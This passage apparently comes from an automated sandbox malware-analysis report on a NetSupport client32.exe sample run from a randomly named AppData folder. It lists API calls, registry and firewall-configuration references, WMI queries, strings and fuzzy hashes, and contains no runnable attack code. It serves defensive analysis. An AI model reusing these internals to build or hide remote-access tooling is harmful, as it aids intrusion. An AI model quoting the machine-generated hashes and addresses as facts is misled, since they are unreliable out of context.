                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,59FD48C0,00000000), ref: 110608FB
                                                                                                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11060962
                                                                                                                                                                • _free.LIBCMT ref: 11060974
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                                                                                                • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                                                                                • API String ID: 999355418-161875503
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,59FD48C0,00000000,?), ref: 1115BA67
                                                                                                                                                                • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                                                                                                • wsprintfW.USER32 ref: 1115BAA7
                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                                                                                                • wsprintfW.USER32 ref: 1115BB67
                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                                                                • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                                                                • API String ID: 3050498177-823534439
                                                                                                                                                                • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                                                                                                • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                                                                                                • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                                                                                                • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                                                                                                  • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                                                                                                • _memset.LIBCMT ref: 11145485
                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                                                                                • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                                • API String ID: 4251163631-545709139
                                                                                                                                                                • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                                                                                                • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                                                                                                • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                                                                                                • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 110150CA
                                                                                                                                                                • _memset.LIBCMT ref: 1101510E
                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                                                                                                Strings
                                                                                                                                                                • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                                                                                                • %012d, xrefs: 110150C4
                                                                                                                                                                • PackedCatalogItem, xrefs: 11015132
                                                                                                                                                                • NSLSP, xrefs: 11015158
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: QueryValue_memsetwsprintf
                                                                                                                                                                • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                                                                • API String ID: 1333399081-1346142259
                                                                                                                                                                • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                                                                                                • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                                                                                                • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                                                                                                • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                • API String ID: 2427920155-3145022300
                                                                                                                                                                • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                                                                                                • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                                                                                                • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                                                                                                • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK$e;
                                                                                                                                                                • API String ID: 536389180-3279045114
                                                                                                                                                                • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                                                                                                • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                                                                                                • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                                                                                                • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                                                                • API String ID: 3494822531-1878648853
                                                                                                                                                                • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                                                                                                • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                                                                                                • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                                                                                                • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                                                                                                • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11107414
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                                                                                • API String ID: 2851125068-2390547818
                                                                                                                                                                • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                                                                                                • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                                                                                                • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                                                                                                • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(000002D8,000000FF), ref: 1101733C
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                                                                                                • CoUninitialize.COMBASE ref: 110173D0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                                                                • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                                                                • API String ID: 2407233060-578995875
                                                                                                                                                                • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                                                                                                • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                                                                                                • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                                                                                                • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(000002D8,000000FF), ref: 11017252
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                                                                                                • CoUninitialize.COMBASE ref: 110172E0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                                                                • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                                                                • API String ID: 2407233060-2037925671
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                                                                                                • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                                                                • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                                                                • API String ID: 3222248624-258972079
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                                                                                                • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                                                                                                • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                                                                • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                                                                • API String ID: 4186647306-532032230
                                                                                                                                                                APIs
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,776CC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                                                                                                • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                                                • API String ID: 3360349984-1136101629
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                • String ID: %s%s%s.bin$562258$_HF$_HW$_SW
                                                                                                                                                                • API String ID: 2111968516-3988310630
                                                                                                                                                                • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                                                                                                • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                                                                                                • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                                                                                                • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                                                                                                • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                                                                                                • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                                                                                                • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                                                                • String ID: NSMDesktopWnd
                                                                                                                                                                • API String ID: 2669163067-206650970
                                                                                                                                                                • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                                                                                                • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                                                                                                • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                                                                                                • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                                                                                                APIs
                                                                                                                                                                • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                                                                                                • KillTimer.USER32(00000000,00007F36,TermUI...), ref: 1113CCB3
                                                                                                                                                                • FreeLibrary.KERNEL32(76D50000,?,TermUI...), ref: 1113CD2B
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeKillLibraryTimer
                                                                                                                                                                • String ID: TermUI
                                                                                                                                                                • API String ID: 2006562601-4085834059
                                                                                                                                                                • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                                                                                                • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                                                                                                • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                                                                                                • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpen
                                                                                                                                                                • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                                                                • API String ID: 47109696-3245241687
                                                                                                                                                                • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                                                                                                • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                                                                                                • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                                                                                                • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                                                                                                  • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                                                                                                  • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                                                                • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                                                                • API String ID: 806825551-1858614750
                                                                                                                                                                • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                                                                                                • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                                                                                                • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                                                                                                • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                                                                                  • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\bpsFyf\client32.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                                                                                                • ResetEvent.KERNEL32(00000268), ref: 11144269
                                                                                                                                                                • SetEvent.KERNEL32(00000268), ref: 1114427F
                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                                                                • String ID: MiniDump
                                                                                                                                                                • API String ID: 1494854734-2840755058
                                                                                                                                                                • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                                                                                                • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                                                                                                • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                                                                                                • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                                                                                                APIs
                                                                                                                                                                • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                                                                                                • wsprintfA.USER32 ref: 11146E06
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
